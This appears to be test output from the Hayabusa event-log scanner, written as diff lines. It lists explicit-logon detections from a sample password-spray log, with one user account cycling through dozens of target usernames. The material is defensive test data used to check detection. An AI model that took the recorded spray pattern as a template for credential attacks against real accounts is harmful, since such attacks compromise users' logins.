+2019-05-01 04:27:50.082 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:51.156 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:52.214 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:53.285 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:54.354 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:55.438 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:56.513 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:57.578 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:58.661 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:27:59.721 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:00.795 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:01.865 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:02.941 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:04.015 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:05.097 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:06.182 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:07.239 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:08.315 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:09.399 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:10.468 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:11.549 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:12.621 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:13.709 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:14.769 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:15.849 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:16.918 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:17.999 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:19.068 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:20.129 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:21.201 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:22.250 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:23.338 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:24.404 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:25.468 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:26.529 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:27.607 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:28.691 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:29.753 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:30.838 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:31.910 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:32.983 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:34.067 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:35.146 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:36.239 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:37.334 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:38.403 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:39.463 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:40.530 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:41.608 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:42.669 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:43.731 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:44.801 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:45.880 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:46.969 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:48.042 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:49.108 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:50.156 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:51.239 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:52.302 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:53.366 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:54.441 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:55.503 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:56.579 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:57.650 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:58.722 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:28:59.800 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:00.872 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:01.934 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:02.995 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:04.075 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:05.156 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:06.238 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:07.308 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:08.370 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:09.433 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:10.523 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:11.590 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:29:12.649 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
